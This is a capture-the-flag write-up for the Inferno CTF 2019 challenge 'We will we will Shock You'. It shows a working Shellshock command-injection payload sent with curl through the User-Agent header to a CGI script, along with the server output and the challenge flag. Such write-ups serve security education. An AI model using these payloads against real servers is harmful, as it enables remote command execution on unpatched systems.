CTFtime.org

We will we will Shock You

by m3ssap0 / BullSoc

Tags: web shellshock 

Rating: 5.0

# Inferno CTF 2019 – We will we will Shock You

* **Category:** Web
* **Points:** 150

## Challenge

> :)
>
> http://104.197.168.32:17012/index.html

## Solution

The name of the challenge reminds the [*Shellshock*](https://en.wikipedia.org/wiki/Shellshock_(software_bug)) vulnerability.

The homepage seems to be an apache2 default index, but analyzing the HTML source an interesting comment can be discovered.

```html

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}

body, html {
padding: 3px 3px 3px 3px;

background-color: #D8DBE2;

font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}

div.main_page {
position: relative;
display: table;

width: 800px;

margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;

border-width: 2px;
border-color: #212738;
border-style: solid;

background-color: #FFFFFF;

text-align: center;
}

div.page_header {
height: 99px;
width: 100%;

background-color: #F5F6F7;
}

div.page_header span {
margin: 15px 0px 0px 50px;

font-size: 180%;
font-weight: bold;
}

div.page_header img {
margin: 3px 0px 0px 40px;

border: 0px 0px 0px;
}

div.table_of_contents {
clear: left;

min-width: 200px;

margin: 3px 3px 3px 3px;

background-color: #FFFFFF;

text-align: left;
}

div.table_of_contents_item {
clear: left;

width: 100%;

margin: 4px 0px 0px 0px;

background-color: #FFFFFF;

color: #000000;
text-align: left;
}

div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}

div.content_section {
margin: 3px 3px 3px 3px;

background-color: #FFFFFF;

text-align: left;
}

div.content_section_text {
padding: 4px 8px 4px 8px;

color: #000000;
font-size: 100%;
}

div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;

border-width: 1px;
border-style: dotted;
border-color: #000000;

background-color: #F5F6F7;

font-style: italic;
}

div.content_section_text p {
margin-bottom: 6px;
}

div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}

div.section_header {
padding: 3px 6px 3px 6px;

background-color: #8E9CB2;

color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}

div.section_header_red {
background-color: #CD214F;
}

div.section_header_grey {
background-color: #9F9386;
}

.floating_element {
position: relative;
float: left;
}

div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}

div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}

div.table_of_contents_item a:hover {
background-color: #000000;

color: #FFFFFF;
}

div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;

color: #000000;
}

div.content_section_text a:hover {
background-color: #000000;

color: #DCDFE6;
}

div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">

<span>
Apache2 Debian Default Page
</span>
</div>

<div class="content_section floating_element">

<div class="section_header section_header_red">
<div id="about"></div>
It works!
</div>
<div class="content_section_text">


This is the default welcome page used to test the correct
operation of the Apache2 server after installation on Debian systems.
If you can read this page, it means that the Apache HTTP server installed at
this site is working properly. You should replace this file (located at
<tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server.


If you are a normal user of this web site and don't know what this page is
about, this probably means that the site is currently unavailable due to
maintenance.
If the problem persists, please contact the site's administrator.

</div>
<div class="section_header">
<div id="changes"></div>
Configuration Overview
</div>
<div class="content_section_text">


Debian's Apache2 default configuration is different from the
upstream default configuration, and split into several files optimized for
interaction with Debian tools. The configuration system is
fully documented in
/usr/share/doc/apache2/README.Debian.gz. Refer to this for the full
documentation. Documentation for the web server itself can be
found by accessing the manual if the <tt>apache2-doc</tt>
package was installed on this server.



The configuration layout for an Apache2 web server installation on Debian systems is as follows:


/etc/apache2/
|-- apache2.conf
|       `--  ports.conf
|-- mods-enabled
|       |-- *.load
|       `-- *.conf
|-- conf-enabled
|       `-- *.conf
|-- sites-enabled
|       `-- *.conf



  • <tt>apache2.conf</tt> is the main configuration
    file. It puts the pieces together by including all remaining configuration
    files when starting up the web server.


  • <tt>ports.conf</tt> is always included from the
    main configuration file. It is used to determine the listening ports for
    incoming connections, and this file can be customized anytime.


  • Configuration files in the <tt>mods-enabled/</tt>,
    <tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain
    particular configuration snippets which manage modules, global configuration
    fragments, or virtual host configurations, respectively.


  • They are activated by symlinking available
    configuration files from their respective
    *-available/ counterparts. These should be managed
    by using our helpers
    <tt>
    a2enmod,
    a2dismod,
    </tt>
    <tt>
    a2ensite,
    a2dissite,
    </tt>
    and
    <tt>
    a2enconf,
    a2disconf
    </tt>. See their respective man pages for detailed information.


  • The binary is called apache2. Due to the use of
    environment variables, in the default configuration, apache2 needs to be
    started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>.
    Calling <tt>/usr/bin/apache2</tt> directly will not work with the
    default configuration.


</div>

<div class="section_header">
<div id="docroot"></div>
Document Roots
</div>

<div class="content_section_text">


By default, Debian does not allow access through the web browser to
<em>any</em> file apart of those located in <tt>/var/www</tt>,
public_html
directories (when enabled) and <tt>/usr/share</tt> (for web
applications). If your site is using a web document root
located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your
document root directory in <tt>/etc/apache2/apache2.conf</tt>.



The default Debian document root is <tt>/var/www/html</tt>. You
can make your own virtual hosts under /var/www. This is different
to previous releases which provides better security out of the box.


</div>

<div class="section_header">
<div id="bugs"></div>
Reporting Problems
</div>
<div class="content_section_text">


Please use the <tt>reportbug</tt> tool to report bugs in the
Apache2 package with Debian. However, check existing bug reports before reporting a new bug.



Please report bugs specific to modules (such as PHP and others)
to respective packages, not to the web server itself.



</div>

</div>
</div>
<div class="validator">
</div>
</body>
</html>
```

Connecting to `http://104.197.168.32:17012/bashferno.cgi` will give you the following output.

```html
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>BASHFerno</title>
</head>
<body>


Hello Bashers!!

</body>
</html>
```

Again some hints that lead to *Shellshock*.

You can try to inject commands via `User-Agent` HTTP header.

```
foo@bar:~$ curl -v 'http://104.197.168.32:17012/bashferno.cgi' -H 'User-Agent: () { :;};echo -e "\r\n$(/usr/bin/id)"'
* Trying 104.197.168.32...
* TCP_NODELAY set
* Connected to 104.197.168.32 (104.197.168.32) port 17012 (#0)
> GET /bashferno.cgi HTTP/1.1
> Host: 104.197.168.32:17012
> Accept: */*
> User-Agent: () { :;};echo -e "\r\n$(/usr/bin/id)"
>
< HTTP/1.1 200 OK
< Date: Fri, 27 Dec 2019 18:30:09 GMT
< Server: Apache/2.4.10 (Debian)
< Transfer-Encoding: chunked
<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Content-type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>BASHFerno</title>
</head>
<body>


Hello Bashers!!

</body>
</html>
* Connection #0 to host 104.197.168.32 left intact

foo@bar:~$ curl -v 'http://104.197.168.32:17012/bashferno.cgi' -H 'User-Agent: () { :;};echo -e "\r\n$(/bin/ls .)"'
* Trying 104.197.168.32...
* TCP_NODELAY set
* Connected to 104.197.168.32 (104.197.168.32) port 17012 (#0)
> GET /bashferno.cgi HTTP/1.1
> Host: 104.197.168.32:17012
> Accept: */*
> User-Agent: () { :;};echo -e "\r\n$(/bin/ls .)"
>
< HTTP/1.1 200 OK
< Date: Fri, 27 Dec 2019 18:32:42 GMT
< Server: Apache/2.4.10 (Debian)
< Transfer-Encoding: chunked
<
bashferno.cgi
flag_for_this_INFERNO.txt
index.html
Content-type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>BASHFerno</title>
</head>
<body>


Hello Bashers!!

</body>
</html>
* Connection #0 to host 104.197.168.32 left intact
```

The `ls` payload will reveal the presence of a `flag_for_this_INFERNO.txt` file that can be easily downloaded with the following URL.

```
http://104.197.168.32:17012/flag_for_this_INFERNO.txt
```

The file will contain the flag.

```
infernoCTF{F33l_Th3_Sh0ck}
```

Original writeup (https://github.com/m3ssap0/CTF-Writeups/blob/master/Inferno%20CTF%202019/We%20will%20we%20will%20Shock%20You/README.md).

Comments